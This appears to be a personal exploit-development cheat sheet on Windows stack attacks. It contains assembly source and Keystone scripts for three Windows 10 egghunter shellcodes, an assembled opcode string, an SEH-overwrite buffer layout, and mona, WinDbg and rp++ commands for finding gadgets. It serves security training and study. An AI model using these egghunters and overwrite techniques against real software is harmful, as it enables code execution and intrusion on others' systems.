xct's notes
Search…
Windows Stack

Egg Hunter

Windows 10 Egghunter (w00tw00t, 32-Bit)

1
from keystone import *
2
3
CODE = (
4
" "
5
" loop_inc_page: "
6
" or dx, 0x0fff ;"
7
" loop_inc_one: "
8
" inc edx ;"
9
" loop_check: "
10
" push edx ;"
11
" mov eax, 0xfffffe3a ;"
12
" neg eax; "
13
" int 0x2e ;"
14
" cmp al,05 ;"
15
" pop edx ;"
16
" loop_check_valid: "
17
" je loop_inc_page ;"
18
" is_egg: "
19
" mov eax, 0x74303077 ;"
20
" mov edi, edx ;"
21
" scasd ;"
22
" jnz loop_inc_one ;"
23
" scasd ;"
24
" jnz loop_inc_one ;"
25
" matched: "
26
" jmp edi ;"
27
)
28
29
30
ks = Ks(KS_ARCH_X86, KS_MODE_32)
31
encoding, count = ks.asm(CODE)
32
instructions = ""
33
for dec in encoding:
34
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
35
36
print("Opcodes = (\"" + instructions + "\")")
Copied!
You might have to modify the syscall number (above 0x1C6, in negated form). Print from windbg with u ntdll!NtAccessCheckAndAuditAlarm. E.g. on Win 10 Pro it was 0x29 for me. Then calculated negated form (here as example for 0x29):
1
>>> i = 0 - 0x29
2
>>> hex (i & ((1 << 32) - 1))
3
'0xffffffd7'
Copied!
Mona can generate one aswell:
1
0:004> .load pykd.pyd
2
0:004> !py mona egg -wow64 -winver 10
3
...
Copied!
This one is kind of reliable as well (32 bit process on 64 bit system):
1
from keystone import *
2
3
CODE = (
4
"mov ebx,cs;"
5
"cmp bl,0x23;"
6
"xor edx,edx;"
7
"or dx,0xfff;"
8
"xor ebx,ebx;"
9
"inc edx;"
10
"push edx;"
11
"push ebx;"
12
"push ebx;"
13
"push ebx;"
14
"push 0x29;"
15
"pop eax;"
16
"mov bl,0xc0;"
17
"call DWORD PTR fs:[ebx];"
18
"add esp,0xc;"
19
"pop edx;"
20
"cmp al,0x5;"
21
"je 0x7;"
22
"mov eax,0x74303077;"
23
"mov edi,edx;"
24
"scas eax,DWORD PTR es:[edi];"
25
"jne 0xe;"
26
"scas eax,DWORD PTR es:[edi];"
27
"jne 0xe;"
28
"jmp edi;"
29
)
30
31
32
ks = Ks(KS_ARCH_X86, KS_MODE_32)
33
encoding, count = ks.asm(CODE)
34
instructions = ""
35
for dec in encoding:
36
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
37
38
print("Opcodes = (\"" + instructions + "\")")
Copied!
When debugging, this one will hit breakpoints all the time. This is normal and does not mean it does not work (see https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/).

Windows 10 Egghunter (w00tw00t, custom SEH handler, 32-Bit)

1
from keystone import *
2
3
CODE = (
4
" start: "
5
" jmp get_seh_address ;"
6
" build_exception_record: "
7
" pop ecx ;"
8
" mov eax, 0x74303077 ;"
9
" push ecx ;"
10
" push 0xffffffff ;"
11
" xor ebx, ebx ;"
12
" mov dword ptr fs:[ebx], esp ;"
13
" sub ecx, 0x04 ;"
14
" add ebx, 0x04 ;"
15
" mov dword ptr fs:[ebx], ecx ;"
16
" is_egg: "
17
" push 0x02 ;"
18
" pop ecx ;"
19
" mov edi, ebx ;"
20
" repe scasd ;"
21
" jnz loop_inc_one ;"
22
" jmp edi ;"
23
" loop_inc_page: "
24
" or bx, 0xfff ;"
25
" loop_inc_one: "
26
" inc ebx ;"
27
" jmp is_egg ;"
28
" get_seh_address: "
29
" call build_exception_record ;"
30
" push 0x0c ;"
31
" pop ecx ;"
32
" mov eax, [esp+ecx] ;"
33
" mov cl, 0xb8 ;"
34
" add dword ptr ds:[eax+ecx], 0x06 ;"
35
" pop eax ;"
36
" add esp, 0x10 ;"
37
" push eax ;"
38
" xor eax, eax ;"
39
" ret ;"
40
)
41
42
ks = Ks(KS_ARCH_X86, KS_MODE_32)
43
encoding, count = ks.asm(CODE)
44
instructions = ""
45
for dec in encoding:
46
instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
47
48
print("Opcodes = (\"" + instructions + "\")")
Copied!
1
\xeb\x2a\x59\xb8\x77\x30\x30\x74\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3
Copied!

SEH Overwrite

Overwrite with POP POP RET followed by EB <distance> 90 90 at the target to jump past the exception handler struct in memory e.g.:
1
<padding><jmp(nseh)><poppopret(seh)><payload>
Copied!

Find Pop Pop Ret

1
!py mona seh
Copied!

Resources

QuickZip Stack BOF 0day: a box of chocolates | Offensive Security
offsectraining

ROP

Find Gadgets with rp++: https://github.com/0vercl0k/rp
1
rp-win-x86.exe -f <file> -r 5 > rop.txt
Copied!
Last modified 2mo ago